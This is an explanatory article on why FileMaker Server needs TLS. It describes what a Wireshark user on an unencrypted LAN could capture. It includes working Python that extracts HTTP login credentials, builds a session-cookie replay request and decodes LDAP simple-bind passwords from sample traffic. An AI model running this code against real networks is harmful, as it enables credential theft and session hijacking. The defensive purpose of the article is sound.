Without SSL/TLS encryption in place on a FileMaker Server, someone with Wireshark or another network packet analyzer positioned on the local network could capture and read the traffic, including sensitive data. On a modern switched network that position is not automatic: the attacker needs a mirror (SPAN) port, a compromised host on the path (the server itself, a hypervisor, a VPN concentrator), or an active technique such as ARP spoofing that redirects traffic through their machine. Once they have it, here is what they, or anyone with the same access, could observe and why it is a significant security risk:
What You Could Capture Using Wireshark on an Unencrypted FileMaker Server Network
- Active Directory Credentials in Plain Text
- Scenario: The FileMaker Server is configured for external authentication against Active Directory, but no SSL/TLS is in place. Depending on the setup, the FileMaker client either sends the domain username and password to FileMaker Server as part of the database login (external authentication) or presents a Kerberos ticket obtained from the domain (true SSO).
- How: In the first case the domain password crosses the wire between the client (e.g., FileMaker Pro) and FileMaker Server unencrypted, and Wireshark reads it directly. The server's own validation traffic to the domain controller is a second exposure: a simple bind over plain LDAP (TCP/389 without StartTLS) carries the password in the clear again, whereas Kerberos and NTLM exchanges never carry the password itself, only encrypted pre-authentication data, service tickets or challenge/response pairs that an attacker can attempt to crack offline. Either way, captured domain credentials let an attacker compromise accounts well beyond FileMaker.
- Risk: With this information, an attacker could impersonate users, access AD resources, or gain elevated privileges, depending on the credentials captured.
- FileMaker Database Traffic (Unencrypted Data)
- Scenario: Users read, edit, and create records, and every find request, record fetch and update travels between the client (FileMaker Pro or Go over the FileMaker network protocol on TCP/5003, or WebDirect over HTTP) and the server.
- How: Wireshark would capture these packets, allowing you to view all the data in clear text. This includes record-level data, which could be personal information (PII), financial data, proprietary business information, or anything else stored in the FileMaker database.
- Risk: This presents a significant privacy and confidentiality breach, especially if sensitive business or customer data is involved. Personal details, financial information, and intellectual property could all be exposed.
- Login Information for FileMaker Accounts
- Scenario: Even without external authentication, if FileMaker native accounts (username and password stored in the file) are used, Wireshark could capture the login exchange.
- How: Whether the user logs in from FileMaker Pro or Go over an unencrypted database connection or from WebDirect over plain HTTP, the account name and password can be recovered from the capture.
- Risk: Once an attacker has the username and password, they could log into the FileMaker Server themselves, gaining access to all the databases and records available to that account.
- Session Data and Tokens
- Scenario: WebDirect is a browser application, so after login the browser holds a session cookie that identifies the user on every subsequent request; the Data API likewise issues a bearer token at login that accompanies every call.
- How: Without SSL, these cookies and tokens are visible in every request. An attacker copies one into their own requests and rides the session until it expires or the user logs out, without ever learning the password.
- Risk: The attacker could gain full access to the user’s account on the FileMaker Server without needing to know their credentials.
- SQL Queries or Data Requests
- Scenario: FileMaker Server can also expose data through ODBC/JDBC connections (xDBC, TCP/2399) and through the Data API over HTTP.
- How: If these channels are unencrypted, Wireshark captures the SQL statements, API requests and their result sets, plus the credentials the ODBC/JDBC driver or API client presents at login. This reveals table and field names, the queries integrations run, and the data they return.
- Risk: An attacker can reconstruct records from the responses, connect directly with the captured credentials, or craft their own SQL or API calls modelled on the ones observed.
- FileMaker Scripts
- Scenario: FileMaker scripts can be used to perform complex database actions such as record lookups, data exports, and even file system manipulations.
- How: Without encryption, Wireshark captures the traffic between FileMaker clients and the server, which may include script definitions as well as the finds, sorts and record updates the scripts perform.
- Risk: An attacker could learn about internal operations, processes, or workflows (and any paths, URLs or credentials hard-coded in script steps) by analyzing the captured traffic, potentially leading to further exploitation.
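The login and session items above describe what a sniffer recovers from a WebDirect login over plain HTTP. The following Python is an added example, not FileMaker code and not a real capture: it works through a constructed HTTP stream (the `/fmi/webd/login` path, the form field names and the `JSESSIONID` cookie name are assumptions standing in for whatever the real application uses), pulls out the Basic-auth and form credentials, extracts the session cookie, and builds the request an attacker would send to reuse that session.

```python
"""Added example: what a passive sniffer recovers from an unencrypted
WebDirect-style login over plain HTTP. The traffic below is constructed
for this example; the endpoint path, form field names and the JSESSIONID
cookie name are assumptions, not FileMaker's actual wire format."""
import base64
from urllib.parse import parse_qs

# Constructed sample: a reassembled TCP stream from port 80, client -> server.
# A real one would come from Wireshark's "Follow TCP Stream".
CLIENT_REQUEST = (
    b"POST /fmi/webd/login HTTP/1.1\r\n"
    b"Host: fms.corp.example\r\n"
    b"Authorization: Basic YWxpY2U6V2ludGVyMjAyNCE=\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 39\r\n"
    b"\r\n"
    b"user=alice&password=Winter2024%21&db=HR"
)

# Constructed sample: the server's reply issuing a session cookie. Note the
# missing Secure flag: without HTTPS the browser could never honour it anyway.
SERVER_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Set-Cookie: JSESSIONID=8F3A2C9E1B7D; Path=/fmi; HttpOnly\r\n"
    b"Location: /fmi/webd/HR\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def parse_http(message: bytes):
    """Split an HTTP/1.1 message into (start line, headers, body).
    Header names are lower-cased; repeated headers are kept as a list."""
    head, _, body = message.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def extract_credentials(request: bytes) -> dict:
    """Recover credentials from an Authorization: Basic header and/or a
    URL-encoded login form. Both are readable as-is in an HTTP capture."""
    found = {}
    _, headers, body = parse_http(request)
    for value in headers.get("authorization", []):
        scheme, _, blob = value.partition(" ")
        if scheme.lower() == "basic":  # base64 is encoding, not encryption
            user, _, password = base64.b64decode(blob).decode("utf-8", "replace").partition(":")
            found["basic_auth"] = (user, password)
    if any("x-www-form-urlencoded" in ct for ct in headers.get("content-type", [])):
        form = parse_qs(body.decode("utf-8", "replace"))
        for field in ("user", "username", "login", "account"):
            if field in form:
                found["form_user"] = form[field][0]
        for field in ("password", "pass", "pwd"):
            if field in form:
                found["form_password"] = form[field][0]
    return found


def extract_session_cookies(response: bytes) -> dict:
    """Collect Set-Cookie values and the flags that matter for replay."""
    _, headers, _ = parse_http(response)
    cookies = {}
    for set_cookie in headers.get("set-cookie", []):
        pair, *attrs = [part.strip() for part in set_cookie.split(";")]
        name, _, value = pair.partition("=")
        flags = {attr.split("=", 1)[0].lower() for attr in attrs}
        cookies[name] = {"value": value, "secure": "secure" in flags, "httponly": "httponly" in flags}
    return cookies


def replay_request(path: str, host: str, cookies: dict) -> bytes:
    """Build the request an attacker sends to ride the stolen session:
    no password needed, just the cookie copied from the capture."""
    cookie_header = "; ".join(f"{name}={c['value']}" for name, c in cookies.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_header}\r\n\r\n".encode()


if __name__ == "__main__":
    print("credentials:", extract_credentials(CLIENT_REQUEST))
    session = extract_session_cookies(SERVER_RESPONSE)
    print("cookies:", session)
    print(replay_request("/fmi/webd/HR", "fms.corp.example", session).decode())
```

Two things worth noticing: the `HttpOnly` flag stops page scripts from reading the cookie but does nothing against a sniffer, and the `Secure` flag, the one that would keep the cookie off plain HTTP, cannot be used at all until the site is served over TLS.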
The Risks of No SSL/TLS Encryption
Here’s why the absence of SSL/TLS on your FileMaker Server opens your network up to significant risks:
1. Data Theft
- Anyone on the local network can easily capture sensitive data transmitted between clients and the FileMaker Server. This could include personal information, proprietary data, business records, and financial information.
2. Credential Theft and Privilege Escalation
- Active Directory or FileMaker native credentials could be stolen, allowing attackers to impersonate legitimate users. Depending on the permissions of the stolen credentials, the attacker could gain administrative privileges or access sensitive databases.
3. Man-in-the-Middle Attacks
- Passive capture only reads traffic, but an attacker who is actually on the path (via ARP spoofing, a rogue switch or a compromised gateway) can also modify it or inject data, because nothing on the wire authenticates the packets. Users then receive altered or false information, and the attacker can corrupt records, deliver harmful data, or cause operational disruption.
4. Session Hijacking
- Attackers can capture session tokens or cookies from WebDirect users and use them to hijack active sessions, gaining unauthorized access to the server as if they were the authenticated user.
5. Eavesdropping and Surveillance
- Even if credentials aren’t captured, an attacker could perform network surveillance, gaining insight into internal operations, data patterns, and business processes just by observing the unencrypted traffic.
6. Regulatory and Compliance Failures
- Many regimes (GDPR, HIPAA, PCI DSS) expect sensitive data to be encrypted in transit. Running FileMaker Server without SSL/TLS makes that expectation impossible to meet for this system and exposes the organization to audit findings and legal and financial penalties.
What Happens When SSL is Enabled?
When SSL/TLS is properly configured on the FileMaker Server (in practice TLS 1.2 or later; the SSL protocol versions themselves are obsolete and the name survives mainly in product UIs):
- Data Encryption: All data between the client and server is encrypted with a symmetric cipher negotiated during the handshake (typically AES-GCM or ChaCha20-Poly1305). Even if someone captures the packets, they cannot read the contents without the session keys, and recovering those with modern cipher suites is computationally infeasible.
- Secure Authentication: Credentials and session tokens travel over the encrypted channel, so a Wireshark capture shows only ciphertext.
- Man-in-the-Middle Defense: TLS authenticates the server to the client with a certificate (the client is authenticated too only if mutual TLS with client certificates is configured, which FileMaker deployments normally do not use). The defense holds only if the client actually validates that certificate: a certificate from a trusted CA whose name matches the server's hostname, and clients that refuse, rather than click through, an untrusted-certificate warning. A self-signed or expired certificate that users have been trained to accept gives an on-path attacker exactly the opening TLS was meant to close.
- Data Integrity: TLS also authenticates every record with a MAC or AEAD tag, ensuring that the data received is the same as the data sent. If an attacker modifies traffic in flight, the receiving side detects it and drops the connection.
In Summary
If a FileMaker Server is running without SSL/TLS encryption on the local network, and you have Wireshark installed, you would be able to:
- Capture credentials (AD or FileMaker native logins) and potentially access the system as a legitimate user.
- View and steal sensitive data being transmitted, including personal, financial, or proprietary information.
- Hijack sessions, especially if WebDirect is being used, by capturing and replaying session tokens.
- Intercept requests made by users, including queries or script actions, and, with an active on-path position, manipulate them, posing significant security and integrity risks.
Enabling SSL/TLS encryption is essential to prevent this type of exposure and secure both the SSO process and ongoing data exchanges between FileMaker clients and FileMaker Server. Without SSL, the internal network traffic is vulnerable to anyone with access and basic network sniffing tools like Wireshark.
Suppose you are equipped with Wireshark and have access to a local network where a FileMaker Server is serving data without SSL/TLS. The potential risks and issues would be significant. Here is what could happen and why it is crucial to have SSL enabled on the FileMaker Server, especially in a production environment.
What Could You Do with Wireshark on an Unencrypted FileMaker Network?
1. Capture and View Unencrypted Data
- Without SSL, all data transmitted between FileMaker clients (e.g., FileMaker Pro, FileMaker Go, WebDirect) and the FileMaker Server is sent unencrypted over the network. This means that with Wireshark, you could capture and read the contents of the data being exchanged.
- What Could Be Captured?
- Login credentials: If users log in without SSL, their usernames and passwords would be exposed in clear text.
- Database queries and responses: Any records or data updates sent to or from the server would be visible, allowing you to view, intercept, and manipulate sensitive information such as personal details, financial data, proprietary information, or any data stored in the FileMaker databases.
- Example: If a user logs into a FileMaker database containing employee records, Wireshark could capture the credentials and all the employee details sent between the server and the client.
2. Active Directory Credentials Exposure (SSO)
- With external authentication, the FileMaker client sends the user's domain username and password to FileMaker Server, which validates them against the domain; with true SSO the client presents a Kerberos ticket instead. Without SSL, the first form exposes the domain password unencrypted between client and server.
- The server-to-domain-controller hop is a separate exposure. With Wireshark you could capture plain LDAP traffic (a simple bind over TCP/389 without StartTLS sends the password unencrypted) or Kerberos and NTLM exchanges. Kerberos and NTLM do not transmit the password or a reusable hash; they transmit encrypted timestamps, service tickets and challenge/response pairs, which can be cracked offline if the password is weak.
- Risk: If Active Directory credentials are intercepted, you could gain access to user accounts across the domain, not just FileMaker, since the same account unlocks email, file shares and other systems.
3. Session Hijacking
- Without SSL, session cookies and tokens used for authenticating users within the FileMaker ecosystem can be captured. These tokens could then be used to hijack user sessions.
- Example: If a user authenticates using WebDirect, Wireshark could capture the session token, allowing you to impersonate that user and access their session without needing their credentials.
4. Man-in-the-Middle Attacks (MITM)
- Without SSL, there is no protection against a Man-in-the-Middle (MITM) attack. Wireshark itself is passive, but with an active technique (ARP or DNS spoofing, or control of a switch or gateway) you could put your machine between clients and the FileMaker Server and relay the traffic, since without TLS clients have no way to tell your machine from the real server.
- Attack Scenario: From that position you could modify the data being transmitted between the client and server or inject content into the communication. This could lead to unauthorized access, data corruption, or even complete takeover of a user's session.
5. Modify or Inject Data
- Not only could you view the unencrypted data, but from an on-path position you could inject or alter data being transmitted across the network, because nothing on the wire authenticates the packets.
- Example: If a FileMaker client sends a data request or submits a record update, you could modify the packet mid-transmission, changing the content before it reaches the server. This could lead to unauthorized data changes, such as altering financial records or tampering with sensitive business information.
6. Sniff API Traffic (If Used)
- If the FileMaker Server is interacting with internal APIs (e.g., REST APIs) or other microservices without SSL, Wireshark could be used to sniff the API requests and responses.
- Example: If FileMaker is fetching sensitive data from an internal API, such as product pricing or inventory levels, this data could be captured in plain text. You could potentially extract sensitive information or even replay API requests to manipulate the system.
7. Sensitive Data Exposure
- Data-at-Rest Encryption (encryption within the database) might be in place, but data-in-transit (communication between clients and the server) would still be exposed. This means all sensitive information such as:
- Customer records
- Financial data
- Personal identification information (PII)
- Proprietary business information
Could all be captured in transit by Wireshark, leading to data breaches or compliance violations.
Real-World Example: Active Directory and FileMaker Without SSL
Let’s say an organization has a FileMaker Server setup using Single Sign-On (SSO) with Active Directory. Users authenticate via their Active Directory credentials, and the server communicates internally with the Active Directory server to verify credentials and assign access permissions. Without SSL:
- Credential Interception:
- With Wireshark, you could capture the network traffic during the authentication process.
- The LDAP traffic (if the server binds with plain LDAP on TCP/389 rather than LDAPS or StartTLS) would expose the bind password in the clear; a Kerberos ticket exchange or NTLM challenge/response would instead yield encrypted material that can be cracked offline to recover weak passwords.
- Data in Transit:
- Once the user is authenticated, their data requests (e.g., accessing databases, updating records, submitting forms) would all be transmitted in clear text, allowing you to see every interaction.
- Sensitive business data like financial reports or customer data could easily be intercepted.
- Session Hijacking:
- After SSO authentication, the session token used by FileMaker clients to maintain an active session could be intercepted and reused by an attacker, granting them access to the user’s session without the need for credentials.
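The LDAP part of the scenario above, and the earlier Active Directory item, come down to one wire fact: an LDAP simple bind is a BER-encoded message in which the password is an ordinary OCTET STRING. The Python below is an added example, not FileMaker or Microsoft code: it encodes a BindRequest with a small BER encoder (so the sample is self-consistent rather than pasted from a real capture), then decodes it the way a sniffer on TCP/389 would, recovering the DN and password for a simple bind and only the mechanism name for a SASL (Kerberos-style) bind, where the password is not on the wire. The service-account DN and password are constructed values.

```python
"""Added example: decode an LDAPv3 BindRequest the way a sniffer on TCP/389
sees it. A simple bind carries the password as a plain OCTET STRING; only
LDAPS (636) or StartTLS hides it. The messages are built here with a small
BER encoder; the DN and password are constructed sample values."""


def _ber_len(n: int) -> bytes:
    """BER definite length: one byte below 128, else 0x80|count then big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(payload)) + payload


def _int(n: int) -> bytes:
    """Minimal two's-complement INTEGER content for a non-negative value."""
    return n.to_bytes((n.bit_length() + 8) // 8, "big")


def build_bind_request(message_id: int, name: str, password=None, sasl_mechanism=None) -> bytes:
    """Encode LDAPMessage { messageID, BindRequest { version 3, name, authentication } }.
    A password gives a simple bind ([0], tag 0x80); otherwise a SASL bind ([3], tag 0xA3)."""
    if password is not None:
        authentication = _tlv(0x80, password.encode())
    else:
        authentication = _tlv(0xA3, _tlv(0x04, sasl_mechanism.encode()))
    bind_request = _tlv(0x60, _tlv(0x02, _int(3)) + _tlv(0x04, name.encode()) + authentication)
    return _tlv(0x30, _tlv(0x02, _int(message_id)) + bind_request)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, content, position after the element) for the TLV at pos."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, pos = first, pos + 2
    else:
        count = first & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + count], "big")
        pos += 2 + count
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(packet: bytes) -> dict:
    """What the sniffer extracts: message id, DN and, for a simple bind, the password."""
    tag, message, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, message_id, pos = _read_tlv(message, 0)
    op_tag, op, _ = _read_tlv(message, pos)
    if op_tag != 0x60:  # [APPLICATION 0] = BindRequest
        raise ValueError("protocolOp is not a BindRequest")
    _, version, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    auth_tag, auth, _ = _read_tlv(op, pos)
    result = {"message_id": int.from_bytes(message_id, "big"),
              "version": int.from_bytes(version, "big"),
              "name": name.decode("utf-8", "replace")}
    if auth_tag == 0x80:  # simple: the password, verbatim
        result["auth"] = "simple"
        result["password"] = auth.decode("utf-8", "replace")
    elif auth_tag == 0xA3:  # sasl: GSSAPI / GSS-SPNEGO etc.; password not on the wire
        _, mechanism, _ = _read_tlv(auth, 0)
        result["auth"] = "sasl"
        result["mechanism"] = mechanism.decode()
    else:
        result["auth"] = "unknown"
    return result


# Constructed samples: a server binding with a service account (simple) and a
# Kerberos-backed bind (SASL), as each would appear on the wire.
SAMPLE_SIMPLE_BIND = build_bind_request(1, "CN=svc-filemaker,OU=Service Accounts,DC=corp,DC=example", "Winter2024!")
SAMPLE_SASL_BIND = build_bind_request(2, "", sasl_mechanism="GSS-SPNEGO")

if __name__ == "__main__":
    print(SAMPLE_SIMPLE_BIND.hex(" "))
    print(parse_bind_request(SAMPLE_SIMPLE_BIND))
    print(parse_bind_request(SAMPLE_SASL_BIND))
```

The hex dump printed for the simple bind shows the password bytes sitting after the `80` tag, readable without any decoding at all; that is what Wireshark's LDAP dissector displays in the `simple` field of an unencrypted bind. The decoder handles long-form lengths, so DNs beyond 127 bytes (common for deeply nested OUs) parse correctly.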
Why SSL is Essential for FileMaker in a Local Network
Even though the FileMaker Server is operating on a local network, the need for SSL is critical because:
- Local Networks Aren’t Immune to Attacks:
- Internal threats (e.g., disgruntled employees, unauthorized contractors, or even compromised devices) can exploit unencrypted data.
- Wireshark is a standard diagnostic tool; in the wrong hands it turns every unencrypted conversation on the network into readable evidence.
- Active Directory Credentials Must Be Protected:
- SSO with AD is convenient, but AD credentials are critical to the security of the entire domain. If compromised, an attacker can access multiple systems within the network.
- Compliance Requirements:
- Many organizations need to comply with data security regulations (GDPR, HIPAA, PCI DSS, etc.). Even internal communication needs to be encrypted to protect personally identifiable information (PII) or sensitive business data.
- Mitigating MITM Attacks:
- SSL/TLS prevents man-in-the-middle attacks, provided clients validate the server's certificate, protecting both the authentication process and the data being exchanged.
Conclusion
If you have access to the local network where a FileMaker Server operates without SSL, Wireshark could give you complete visibility into the unencrypted traffic, exposing sensitive information such as:
- Login credentials (usernames, passwords, and crackable domain authentication material)
- Database queries (personal data, financial records, proprietary information)
- Session tokens (allowing session hijacking)
- Internal API requests and responses
By encrypting traffic with SSL/TLS, FileMaker Server protects its FileMaker client, WebDirect and Data API communications from interception. Each remaining channel (ODBC/JDBC consumers and the server's own authentication traffic to the domain controller) must be encrypted separately for Active Directory credentials, business data and user sessions to be safe end to end.
This is why SSL/TLS is critical for any production FileMaker Server, even if it only operates within a local network. Without it, sensitive data remains vulnerable to anyone with network access and a tool like Wireshark.